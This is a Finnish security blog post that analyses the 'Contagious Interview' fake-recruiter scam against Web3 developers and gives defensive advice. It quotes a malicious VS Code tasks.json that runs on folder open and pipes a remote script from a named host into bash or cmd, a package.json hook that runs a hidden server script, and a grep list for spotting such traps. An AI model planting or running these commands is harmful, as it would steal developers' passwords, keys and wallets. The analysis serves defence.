Security
tradingmaster-ai-sentinel
Kirjoittanut
TradingMaster AI Sentinel
5 min luku

Tarttuva Haastattelu: Kuinka valerekrytoijat hakkeroivat kehittäjiä

Tarttuva Haastattelu (Contagious Interview): Kuinka valerekrytoijat hakkeroivat kehittäjiä

Tiivistelmä: Uusi valtioiden sponsoroimien hyökkäysten aalto iskee krypton parhaiten kehittäjiin. Huijarit esiintyvät rekrytoijina tai teknologiajohtajina ja pakottavat hakijat avaamaan haitallista koodia. Tämä artikkeli analysoi tapauksen "Martin Erazo", VS Code "tasks.json" -hyökkäyksen ja välttämättömän "Polttoprotokollan" (Burn Protocol) selviytymiseen.

Vastuuvapauslauseke: Tämä artikkeli raportoi kyberturvallisuustapauksista, joissa esiinnytään oikeina henkilöinä. Nimet "Martin Erazo" ja "Ara Vartanian" viittaavat hyökkääjien käyttämiin persooniin. Uskomme, että näiden nimien takana olevat todelliset henkilöt ovat syyttömiä identiteettivarkauden uhreja.



1. Täydellinen Uhri: "Martin Erazo" -persoona

Se alkaa viestillä, joka painaa kokeneen kehittäjän oikeita nappeja:

  • Rooli: CTO / Lead Architect
  • Budjetti: 6 miljoonan dollarin rahoitus varmistettu
  • Teknologia: Web3, AI, Hajautettu Infra

Äskettäin vahvistetussa hyökkäyksessä rekrytoija nimeltä "Martin Erazo" otti yhteyttä LinkedInin kautta. Profiili käytti oikean teatteriohjaajan nimeä ja kuvaa, mutta työhistoria oli väärennetty ja vaihtui yhtäkkiä "IT-projektinhallintaan" vuonna 2025 – klassinen merkki kapatusta tai ostetusta tilistä.

Huijaus etenee nopeasti. He ohittavat normaalin HR-seulonnan ja siirtyvät suoraan "Tekniseen Haastatteluun" johtajan kanssa – tässä tapauksessa jäljitelmä oikeasta alan CTO:sta, Ara Vartanianista (nykyään Limit Breakilla).

Punainen Lippu: Projektien nimet vaihtuvat jatkuvasti. Rekrytoija myy "Betfiniä" (GameFi-alusta), mutta lähetetty esitys koskee "SpaceXView'ta" (Metaverse-projekti). Tämä epäjohdonmukaisuus on vihje siitä, että huijarit kierrättävät materiaaleja kampanjoiden välillä.

Social Engineering Recruiter vs Hacker

2. Ansa: "Voitko tarkistaa MVP-koodimme?"

Väärennetty "CTO" väittää tarvitsevansa asiantuntevaa silmääsi tarkistamaan heidän MVP (Minimum Viable Product) -koodinsa. He lähettävät GitHub-repo-linkin tai ZIP-tiedoston ja painostavat sinua avaamaan sen haastattelun aikana tai heti sen jälkeen.

Tässä hakkerointi tapahtuu.

He käyttävät hyväkseen auttamishaluasi ja egoasi. Luulet etsiväsi bugia React-komponentista. Todellisuudessa "bugi" on "ominaisuus", joka on suunniteltu varastamaan säästösi.

3. Tekninen Soluttautuminen: Zero-Click Malware

Hyökkääjät käyttävät "nollan klikkauksen" tai "vähäisen klikkauksen" haavoittuvuuksia, jotka kohdistuvat kehittäjätyökaluihin. Heidän ei tarvitse, että suoritat sovelluksen; riittää, että avaat kansion.

Ase: .vscode/tasks.json

Tässä nimenomaisessa tapauksessa repo sisälsi miinoitetun .vscode/tasks.json -tiedoston. Tämä tiedosto kertoo VS Codelle, miten projekti rakennetaan.

Haitallinen Koodi:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}
  • "runOn": "folderOpen": Tämä on laukaisin. Heti kun avaat kansion VS Codessa, tämä tehtävä suoritetaan automaattisesti.
  • Payload: Se käyttää curlia ladatakseen skriptin osoitteesta vscodesettingtask.vercel.app – tunnettu haittaohjelmien isäntä, joka on naamioitu asetus-APIksi.
  • Tulos: Skripti toimii muistissa ja varastaa välittömästi Chrome-salasanat, istuntoevästeet ja SSH-avaimet.

Suunnitelma B: package.json scripts

Jos VS Code -hakkerointi epäonnistuu, heillä on npm-skriptit:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

npm install tai npm start käynnistäminen laukaisee server/server.js -tiedoston – paikallisen C2 (Command and Control) -skriptin, joka vuotaa ympäristömuuttujasi (AWS-avaimet, lompakon siemenet) hyökkääjälle.

4. Punaiset Liput vs Vihreät Liput

Kuinka havaita se ennen kuin on liian myöhäistä?

Jos olet kehittäjä, "Yksityiset Repot" tai ZIP-tiedostot pitäisi laukaista hälytykset. Lailliset yritykset käyttävät Julkisia Repoja tai standardoituja testausalustoja.

Varoitus: Tämä ei ole ainoa tapa hyökätä kehittäjiä vastaan. Lue Yhteistyökumppanin Ansasta Discordissa ja kuinka Toimitusketjuhyökkäykset tekevät riippuvuuksista vaarallisia.

🚩 Punainen Lippu (Juokse)✅ Vihreä Lippu (Turvallinen)
Koodi Ensin: Lähettää koodia ennen työtarjoustaVakioprosessi: Haastattelu ensin, koodi sitten
Rikkinäinen Identiteetti: Rekrytoijalla merkityksetön tausta (esim. Taiteilija -> IT-päällikkö)Vahvistettu Historia: LinkedIn-ura on johdonmukainen
Ristiriita: Projektien nimet eivät täsmää (Betfin vs SpaceXView)Johdonmukaisuus: Nimi, dokumentaatio ja verkkosivusto täsmäävät
Kiireellisyys: "CTO odottaa", "avaa nyt"Kärsivällisyys: He kunnioittavat aikaasi ja aikatauluasi
Henkilökohtainen Sähköposti: [email protected]Yrityssähköposti: [email protected] (toimivilla MX-tietueilla)

5. Turvallisuusprotokolla: Kuinka haastatella turvallisesti

Jos olet Senior Dev, sinua tullaan metsästämään. Ympäristön kovettaminen on pakollista.

Protokolla 1: "Burner" -ympäristö

Älä KOSKAAN käytä päätyöasemaasi kooditesteihin.

  • Virtuaalikoneet: Käytä VirtualBoxia tai VMWarea.
  • Cloud Dev -ympäristöt: Käytä GitHub Codespacesia tai Gitpodia. Nämä ovat lyhytikäisiä ja eristettyjä paikallisista lompakkotiedostoistasi.

Protokolla 2: Forensinen Auditointi

Ennen kuin avaat tuntematonta koodia:

  1. Tarkista .vscode/tasks.json: Etsi runOn: folderOpen.
  2. Tarkista package.json: Etsi epäilyttäviä preinstall- tai postinstall-skriptejä.
  3. Hakusanat: käytä grepiä sanoille curl, wget, os.homedir(), .ssh, wallet.

Protokolla 3: VS Code Kovettaminen

Poista "Workspace Trust" käytöstä maailmanlaajuisesti.

  • Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
  • Tämä pakottaa VS Coden kysymään lupaa ennen kansion tason tehtävien suorittamista.

VS Code Hardening Shield

6. Ratkaisu: "Burn Protocol"

Jos olet avannut haitallisen Repon (kuten "Martin Erazo" -persoonan lähettämä), oleta, että sinut on hakkeroitu. Palautus ei riitä.

  1. Katkaise Yhteys: Irrota verkkokaapeli välittömästi.
  2. Polta Lompakko: Yksityiset avaimesi on vuodettu. Luo uudet lompakot puhtaalla laitteella (puhelin) ja siirrä jäljellä olevat varat. Älä koskaan käytä vanhaa seediä.
  3. Tapa Istunnot: Kirjaudu ulos kaikista istunnoista Google, GitHub, AWS. Mitätöi aktiiviset tokenit.
  4. SSH Avain Audit: Tarkista GitHub/GitLab-asetukset. Hyökkääjät lisäävät usein omat SSH-avaimensa säilyttääkseen takaoven. Poista ne, joita et tunnista.
  5. Nuke It: Pyyhi levy ja asenna käyttöjärjestelmä uudelleen. Tämä on ainoa tapa olla 100% varma, että Rootkitit ovat poissa.

Johtopäätös

"Tarttuva Haastattelu" -huijaus käyttää omaa asiantuntemustasi sinua vastaan. Se kohdistuu haluusi ratkaista ongelmia. Mutta Web3:ssa vainoharhaisuus on ammatillinen hyve. Vahvista jokainen identiteetti, hiekkalaatikoi jokainen repo, äläkä koskaan luota "rekrytoijaan", jolla on kiire saada sinut ajamaan koodia.

Oletko valmis?

Aloita kaupankäynti AI-pohjaisella varmuudella tänään

Aloita

Saavutettavuus